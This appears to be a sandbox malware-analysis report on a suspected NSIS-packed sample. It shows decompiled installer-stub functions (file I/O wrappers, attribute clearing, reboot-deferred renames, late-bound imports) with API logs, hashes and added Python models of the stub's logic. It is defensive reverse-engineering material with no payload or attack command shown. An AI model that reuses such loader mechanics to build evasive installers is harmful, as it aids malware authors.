                • DeleteFileA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405708
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405720
                Similarity
                • API ID: File$Attributes$DeleteDirectoryRemove
                • String ID:
                • API String ID: 1655745494-0
                • Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                • Instruction ID: ab3c30a2a51d8520bfc91e36631e3b158bafcebe445a439927c7769123fd08c9
                • Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                • Instruction Fuzzy Hash: E4E0E531115A91D6C2106774AE0865B2AD8EFC6364F05493BF892B30C0DB78880BAA6E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (rendered graph not recoverable from the extracted text; basic blocks and edges follow, Executed/Not Executed colouring lost)
                • 401389-40138e → 4013fa-4013fc
                • 4013fa-4013fc → 401390-4013a0, 4013fe
                • 401390-4013a0 → 4013fe, 4013a2-4013a3 call 401434
                • 4013fe → 401400-401401
                • 4013a2-4013a3 → 4013a8-4013ad
                • 4013a8-4013ad → 401404-401409, 4013af-4013b7 call 40136d
                • 401404-401409 → 401400-401401
                • 4013af-4013b7 → 4013b9-4013bb, 4013bd-4013c2
                • 4013b9-4013bb → 4013c4-4013c9; 4013bd-4013c2 → 4013c4-4013c9
                • 4013c4-4013c9 → 4013fa-4013fc, 4013cb-4013f4 MulDiv SendMessageA
                • 4013cb-4013f4 → 4013fa-4013fc
                C-Code - Quality: 59%
                			/* Interpreter loop over the 0x1c-byte entry table whose base is stored at
                			 * 0x42f450 (layout and constants match NSIS's ExecuteCodeSegment: entry type 1
                			 * is EW_RET, 0x7fffffff is EXEC_ERROR, 0x402 is PBM_SETPOS, 0x7530 = 30000 is
                			 * the progress range). The second argument, the progress-bar window handle,
                			 * was not recovered by the decompiler; it appears as the stack slots
                			 * _t18 + 0xc and _t18 + 0x18. */
                			int E00401389(signed int _a4) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				signed int _t16;
                				signed int _t17;
                				void* _t18;
                
                				_t17 = _a4;                                  /* index of the current entry */
                				while(_t17 >= 0) {
                					_t6 = _t17 * 0x1c +  *0x42f450;          /* &entries[_t17] */
                					if( *_t6 == 1) {                         /* EW_RET: end of this code segment */
                						break;
                					}
                					_t8 = E00401434(_t6); // executed         /* execute one entry */
                					if(_t8 == 0x7fffffff) {                  /* EXEC_ERROR: abort the segment */
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);                   /* resolve the result to a 1-based jump target, or 0 */
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;                     /* jump: new index */
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;                  /* progress delta = distance jumped */
                					} else {
                						_t12 = _t10 + 1;                     /* fall through: one entry of progress */
                						_t17 = _t17 + 1;
                					}
                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {   /* progress window present */
                						 *0x42ebec =  *0x42ebec + _t12;      /* running position */
                						/* PBM_SETPOS, position scaled into 0..30000 against the total at 0x42ebd4 */
                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0);
                					}
                				}
                				return 0;
                			}












                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
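                The loop above is easier to reason about as a small model. The Python below is an added example, not code from the report or from the sample: it parses a constructed blob of 0x1c-byte entries, applies the same return-value convention the decompiled loop uses (0x7fffffff aborts, a non-zero value is a 1-based jump target, 0 falls through) and records the PBM_SETPOS values the real loop would post, using a model of MulDiv's round-to-nearest. The demo opcodes 0x10, 0x100 and 0x101 and the `demo_execute` stand-in for E00401434/E0040136D are assumptions made for this example; the sample's real opcode semantics are not on this page.

```python
"""Model of the E00401389 entry loop (added example, not from the sample)."""
import struct

ENTRY_SIZE = 0x1C          # _t17 * 0x1c: seven 32-bit fields per entry
EW_RET = 1                 # *_t6 == 1 ends the segment
EXEC_ERROR = 0x7FFFFFFF    # error sentinel checked after E00401434
PBM_SETPOS = 0x402         # message posted to the progress window
PROGRESS_RANGE = 0x7530    # 30000, the MulDiv numerator

# Hypothetical demo opcodes (assumptions for this example only).
OP_NOP = 0x10              # executes and falls through
OP_JUMP = 0x100            # operand 0 is a 1-based target entry
OP_FAIL = 0x101            # simulates an entry that returns EXEC_ERROR


def muldiv(number, numerator, denominator):
    """Win32 MulDiv for non-negative inputs: (a*b)/c rounded to nearest."""
    if denominator == 0:
        return -1
    return (number * numerator + denominator // 2) // denominator


def parse_entries(blob):
    """Split a raw entry blob into (which, op0..op5) tuples."""
    if len(blob) % ENTRY_SIZE:
        raise ValueError("blob is not a whole number of 0x1c-byte entries")
    return [struct.unpack_from("<7i", blob, off)
            for off in range(0, len(blob), ENTRY_SIZE)]


def demo_execute(entry):
    """Stand-in for E00401434 + E0040136D: 0, a 1-based target, or EXEC_ERROR."""
    which, ops = entry[0], entry[1:]
    if which == OP_JUMP:
        return ops[0]
    if which == OP_FAIL:
        return EXEC_ERROR
    return 0


def walk_segment(entries, execute, total_steps, start_pos=0, progress_pos=0):
    """Replay the decompiled loop; returns (status, progress messages sent)."""
    pos = start_pos
    sent = []
    while pos >= 0:
        if entries[pos][0] == EW_RET:
            break
        rv = execute(entries[pos])
        if rv == EXEC_ERROR:
            return EXEC_ERROR, sent
        if rv:                      # _t10 != 0: jump, delta is the distance moved
            new_pos = rv - 1
            delta = new_pos - pos
            pos = new_pos
        else:                       # fall through: advance one entry
            delta = 1
            pos += 1
        progress_pos += delta       # *0x42ebec += _t12
        sent.append((PBM_SETPOS, muldiv(progress_pos, PROGRESS_RANGE, total_steps)))
    return 0, sent


def build_demo_blob():
    """Constructed five-entry program: NOP, JUMP over entry 2, NOP, NOP, RET."""
    program = [
        (OP_NOP, 0, 0, 0, 0, 0, 0),   # entry 0
        (OP_JUMP, 4, 0, 0, 0, 0, 0),  # entry 1: jump to entry 3 (1-based 4)
        (OP_NOP, 0, 0, 0, 0, 0, 0),   # entry 2: skipped by the jump
        (OP_NOP, 0, 0, 0, 0, 0, 0),   # entry 3
        (EW_RET, 0, 0, 0, 0, 0, 0),   # entry 4: end of segment
    ]
    return b"".join(struct.pack("<7i", *e) for e in program)


def run_demo():
    """Walk the constructed program with four progress steps in total."""
    entries = parse_entries(build_demo_blob())
    return walk_segment(entries, demo_execute, total_steps=4)


if __name__ == "__main__":
    status, messages = run_demo()
    print("status", hex(status))
    for msg, value in messages:
        print(f"SendMessageA(hwnd, {msg:#x}, {value}, 0)")
```

Note that a jump counts the skipped entries as progress (the delta is the distance moved, not 1), which is why the constructed program reaches 30000 after three posted messages.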
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* Late-bound import resolver: entry _a4 of an 8-byte {dll name, function name}
                			 * table at 0x40a240. If the DLL is not already mapped, E0040628F builds
                			 * "<system directory>\<dll>" with wsprintfA and loads it with LoadLibraryExA and
                			 * flag 0x8 (LOAD_WITH_ALTERED_SEARCH_PATH), so the library is taken from the
                			 * system directory rather than the installer's own directory. This is the
                			 * "extensive use of GetProcAddress" the signatures flag. */
                			void* E004062FD(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				CHAR* _t8;
                				signed int _t10;
                
                				_t10 = _a4 << 3;                               /* index * sizeof(entry) */
                				_t8 =  *(_t10 + 0x40a240);                     /* DLL name */
                				_t5 = GetModuleHandleA(_t8);
                				if(_t5 == 0) {
                					_t5 = E0040628F(_t8); // executed            /* load from the system directory */
                					if(_t5 == 0) {
                						return 0;
                					}
                				}
                				return GetProcAddress(_t5,  *(_t10 + 0x40a244)); /* function name */
                			}






                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                  • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32 ref: 004062A6
                  • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
                  • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
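                The lookup E004062FD performs is an index into a fixed table, so once a memory image is at hand the full list of late-bound APIs can be read straight out of it. The Python below is an added example, not code from the report or from the sample: it walks a table of 8-byte {dll pointer, function pointer} entries at the decompiled address 0x40a240 in an image based at 0x400000, and lists which DLLs the GetModuleHandleA-then-LoadLibraryExA fallback would have to load. The image, the three (DLL, function) pairs in it and the string placement at 0x40a300 are constructed for the example; the real table's length is not shown on this page, so the walker takes an entry limit and also stops at a NULL module pointer, both of which are assumptions.

```python
"""Recover the late-bound import table behind E004062FD (added example)."""
import struct

IMAGE_BASE = 0x400000
TABLE_VA = 0x40A240    # hard-coded base in the decompiled function
ENTRY_SIZE = 8         # _a4 << 3: {char *dll; char *func;}
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8   # third argument of the LoadLibraryExA subcall


def read_cstring(image, va):
    """Read a NUL-terminated ASCII string at a virtual address."""
    off = va - IMAGE_BASE
    end = image.index(b"\x00", off)
    return image[off:end].decode("ascii")


def walk_api_table(image, table_va=TABLE_VA, max_entries=64):
    """Return [(dll, func), ...]; stops at max_entries or a NULL dll pointer (assumed terminator)."""
    pairs = []
    for idx in range(max_entries):
        off = table_va - IMAGE_BASE + idx * ENTRY_SIZE   # same arithmetic as _t10 + 0x40a240
        dll_ptr, func_ptr = struct.unpack_from("<II", image, off)
        if dll_ptr == 0:
            break
        pairs.append((read_cstring(image, dll_ptr), read_cstring(image, func_ptr)))
    return pairs


def modules_to_load(pairs, already_mapped):
    """DLLs GetModuleHandleA would miss, i.e. the ones E0040628F would LoadLibraryExA."""
    mapped = {m.lower() for m in already_mapped}
    wanted = []
    for dll, _ in pairs:
        if dll.lower() not in mapped and dll not in wanted:
            wanted.append(dll)
    return wanted


def system_library_path(system_dir, dll):
    """The wsprintfA step: "<system dir>\\<dll>", loaded with flag 0x8."""
    return f"{system_dir}\\{dll}", LOAD_WITH_ALTERED_SEARCH_PATH


def build_demo_image():
    """Constructed image: three table entries, strings placed from 0x40a300 on."""
    image = bytearray(0x0B000)   # covers 0x400000-0x40b000 of a hypothetical image
    entries = [("KERNEL32.dll", "GetDiskFreeSpaceExA"),   # constructed, not from the sample
               ("SHLWAPI.dll", "SHAutoComplete"),
               ("ADVAPI32.dll", "RegDeleteKeyExA")]
    cursor = 0x40A300
    table_off = TABLE_VA - IMAGE_BASE
    for i, (dll, func) in enumerate(entries):
        ptrs = []
        for text in (dll, func):
            data = text.encode("ascii") + b"\x00"
            start = cursor - IMAGE_BASE
            image[start:start + len(data)] = data
            ptrs.append(cursor)
            cursor += len(data)
        struct.pack_into("<II", image, table_off + i * ENTRY_SIZE, *ptrs)
    return bytes(image)   # the entry after the last one stays all-zero


if __name__ == "__main__":
    pairs = walk_api_table(build_demo_image())
    for dll, func in pairs:
        print(f"{dll}!{func}")
    for dll in modules_to_load(pairs, ["kernel32.dll"]):
        print("would load:", *system_library_path("C:\\Windows\\System32", dll))
```

On a real dump the walker is pointed at the 0x40a000 region (the third associated .sdmp above), with the entry limit set from the table's size in the binary rather than the NULL heuristic.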
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                • Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
                • Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                • Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			/* Open a file while preserving its existing attributes. _a8 is the desired
                			 * access, _a12 the creation disposition; sharing is FILE_SHARE_READ (1). The
                			 * neg/sbb/and idiom the decompiler rendered as "asm(sbb ecx, ecx)" plus
                			 * ~(_t5 + 1) & _t5 passes 0 as dwFlagsAndAttributes when GetFileAttributesA
                			 * returned INVALID_FILE_ATTRIBUTES (-1) and the attributes otherwise. */
                			void* E00405AFE(CHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesA(_a4); // executed
                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12, (_t5 == 0xffffffff) ? 0 : _t5, 0); // executed
                				return _t6;
                			}






                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* Clear FILE_ATTRIBUTE_READONLY (0x1) so the caller can delete or overwrite the
                			 * file. Returns the original attributes (a DWORD, so typed as int here rather
                			 * than the decompiler's signed char), or INVALID_FILE_ATTRIBUTES (-1) if the
                			 * path does not exist. */
                			signed int E00405AD9(CHAR* _a4) {
                				signed int _t3;
                				signed int _t7;
                
                				_t3 = GetFileAttributesA(_a4); // executed
                				_t7 = _t3;
                				if(_t7 != 0xffffffff) {
                					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed   /* mask off the read-only bit */
                				}
                				return _t7;
                			}






                APIs
                • GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                • Instruction ID: a8f15113e5c9b75401305b8f42f7b900fd80c9315a1f16fe78aaf2180abbdc87
                • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                • Instruction Fuzzy Hash: B8D0C972504122ABC2102728AE0889BBB55DB54271702CB35F9B9A26B1DB304C56AA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* Close the file handle kept in the global at 0x40a018 (the same global
                			 * E004031A9 seeks on) and hand the temporary directory to E0040572D with
                			 * flags 7, most likely the cleanup of the extraction directory. Note that the
                			 * literal below still carries the sandbox's real short user name (FRONTD~1)
                			 * while the Strings entry for the same address shows the anonymised form. */
                			void* E004036DB() {
                				void* _t1;
                				void* _t3;
                				signed int _t6;
                
                				_t1 =  *0x40a018; // 0xffffffff
                				if(_t1 != 0xffffffff) {
                					CloseHandle(_t1);
                					 *0x40a018 =  *0x40a018 | 0xffffffff;   /* mark the handle as closed (-1) */
                					_t6 =  *0x40a018;
                				}
                				E00403720();
                				/* _t6 is a register (ecx) argument the decompiler could not resolve; it is
                				 * uninitialised on the path where the handle was already -1 */
                				_t3 = E0040572D(_t6, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp\\", 7); // executed
                				return _t3;
                			}







                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\, xrefs: 004036FA
                Similarity
                • API ID: CloseHandle
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\
                • API String ID: 2962429428-2962041203
                • Opcode ID: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
                • Instruction ID: a1bde45f6d244ba91e802d61d3971a42b11b03c2813ac8242e2f7427b9539a77
                • Opcode Fuzzy Hash: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
                • Instruction Fuzzy Hash: 5DC01270504701A6C5346F74AE4F6093A14AB44735F604725B0B5F21F1CB7C565A556E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* CreateDirectoryA wrapper: 0 on success, otherwise the Win32 error code from
                			 * GetLastError. The API log below shows it being called on %TEMP%. */
                			int E004055CF(CHAR* _a4) {
                				int _t2;
                
                				_t2 = CreateDirectoryA(_a4, 0); // executed   /* default security descriptor */
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				return 0;
                			}





                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
                • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* ReadFile wrapper that treats a short read as failure: _a12 is reused as
                			 * lpNumberOfBytesRead and compared with the requested length. */
                			int E00405B76(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;                                  /* requested length */
                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {                /* API failure or fewer bytes than asked */
                					return 0;
                				}
                				return 1;
                			}






                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                • Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
                • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                • Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* WriteFile wrapper, mirror of E00405B76: succeeds only if every requested
                			 * byte was written (_a12 is reused as lpNumberOfBytesWritten). */
                			int E00405BA5(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;                                  /* requested length */
                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {                /* API failure or partial write */
                					return 0;
                				}
                				return 1;
                			}






                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                • Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
                • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                • Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			/* Move or replace a file, deferring to the next boot when needed. Flags 5 =
                			 * MOVEFILE_REPLACE_EXISTING (0x1) | MOVEFILE_DELAY_UNTIL_REBOOT (0x4). If that
                			 * fails, E00405BD4 (GetShortPathNameA, wsprintfA, the "[Rename]" literal and a
                			 * file rewrite, see its subcalls below) appends a legacy [Rename] entry, the
                			 * wininit.ini mechanism for renames applied at boot. Either way the counter at
                			 * 0x42f4b0 is incremented: a reboot is now pending. */
                			int E00405D44(void* __ecx, CHAR* _a4, CHAR* _a8) {
                				int _t5;
                				void* _t6;
                
                				_t6 = __ecx;
                				_t5 = MoveFileExA(_a4, _a8, 5); // executed    /* _a4 = existing, _a8 = new name */
                				if(_t5 == 0) {
                					_t5 = E00405BD4(_t6, _a4, _a8);          /* fallback: [Rename] entry */
                				}
                				 *0x42f4b0 =  *0x42f4b0 + 1;                 /* reboot-pending counter */
                				return _t5;
                			}






                APIs
                • MoveFileExA.KERNEL32 ref: 00405D4E
                  • Part of subcall function 00405BD4: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                  • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C0E
                  • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C2B
                  • Part of subcall function 00405BD4: wsprintfA.USER32 ref: 00405C49
                  • Part of subcall function 00405BD4: GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                  • Part of subcall function 00405BD4: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                  • Part of subcall function 00405BD4: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                  • Part of subcall function 00405BD4: SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                  • Part of subcall function 00405BD4: GlobalFree.KERNEL32 ref: 00405D32
                Similarity
                • API ID: File$GlobalNamePathShort$AllocCloseFreeHandleMovePointerSizelstrcpywsprintf
                • String ID:
                • API String ID: 299535525-0
                • Opcode ID: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
                • Instruction ID: 8264f8fe3c9c578956083b3625533de480bc17291d9062dfb527519968c09de9
                • Opcode Fuzzy Hash: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
                • Instruction Fuzzy Hash: CAD0A932108300BEDB122B20EC08A1BBBB1FF9031AF21C83EF184600B0EB329021DF09
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004031A9(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                				return _t2;
                			}

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00404A09(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				signed int _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				signed char* _v28;
                				long _v32;
                				signed int _v40;
                				int _v44;
                				signed int* _v56;
                				signed char* _v60;
                				signed int _v64;
                				long _v68;
                				void* _v72;
                				intOrPtr _v76;
                				intOrPtr _v80;
                				void* _v84;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t192;
                				intOrPtr _t195;
                				intOrPtr _t197;
                				long _t201;
                				signed int _t205;
                				signed int _t216;
                				void* _t219;
                				void* _t220;
                				int _t226;
                				signed int _t231;
                				signed int _t232;
                				signed int _t233;
                				signed int _t239;
                				signed int _t241;
                				signed char _t242;
                				signed char _t248;
                				void* _t252;
                				void* _t254;
                				signed char* _t270;
                				signed char _t271;
                				long _t276;
                				int _t282;
                				signed int _t283;
                				long _t284;
                				signed int _t287;
                				signed int _t294;
                				signed char* _t302;
                				struct HWND__* _t306;
                				int _t307;
                				signed int* _t308;
                				int _t309;
                				long _t310;
                				signed int _t311;
                				void* _t313;
                				long _t314;
                				int _t315;
                				signed int _t316;
                				void* _t318;
                
                				_t306 = _a4;
                				_v12 = GetDlgItem(_t306, 0x3f9);
                				_v8 = GetDlgItem(_t306, 0x408);
                				_t318 = SendMessageA;
                				_v20 =  *0x42f448;
                				_t282 = 0;
                				_v24 =  *0x42f414 + 0x94;
                				if(_a8 != 0x110) {
                					L23:
                					if(_a8 != 0x405) {
                						_t285 = _a16;
                					} else {
                						_a12 = _t282;
                						_t285 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					if(_a8 == 0x4e || _a8 == 0x413) {
                						_v16 = _t285;
                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                							if(( *0x42f41d & 0x00000002) != 0) {
                								L41:
                								if(_v16 != _t282) {
                									_t231 = _v16;
                									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                									}
                									_t232 = _v16;
                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                										_t285 = _v20;
                										_t233 =  *(_t232 + 0x5c);
                										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
                										} else {
                											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							if(_a8 == 0x413) {
                								L33:
                								_t285 = 0 | _a8 != 0x00000413;
                								_t239 = E00404957(_v8, _a8 != 0x413);
                								_t311 = _t239;
                								if(_t311 >= _t282) {
                									_t88 = _v20 + 8; // 0x8
                									_t285 = _t239 * 0x418 + _t88;
                									_t241 =  *_t285;
                									if((_t241 & 0x00000010) == 0) {
                										if((_t241 & 0x00000040) == 0) {
                											_t242 = _t241 ^ 0x00000001;
                										} else {
                											_t248 = _t241 ^ 0x00000080;
                											if(_t248 >= 0) {
                												_t242 = _t248 & 0x000000fe;
                											} else {
                												_t242 = _t248 | 0x00000001;
                											}
                										}
                										 *_t285 = _t242;
                										E0040117D(_t311);
                										_a12 = _t311 + 1;
                										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
                										_a8 = 0x40f;
                									}
                								}
                								goto L41;
                							}
                							_t285 = _a16;
                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						} else {
                							goto L48;
                						}
                					} else {
                						L48:
                						if(_a8 != 0x111) {
                							L56:
                							if(_a8 == 0x200) {
                								SendMessageA(_v8, 0x200, _t282, _t282);
                							}
                							if(_a8 == 0x40b) {
                								_t219 =  *0x42a854;
                								if(_t219 != _t282) {
                									ImageList_Destroy(_t219);
                								}
                								_t220 =  *0x42a868;
                								if(_t220 != _t282) {
                									GlobalFree(_t220);
                								}
                								 *0x42a854 = _t282;
                								 *0x42a868 = _t282;
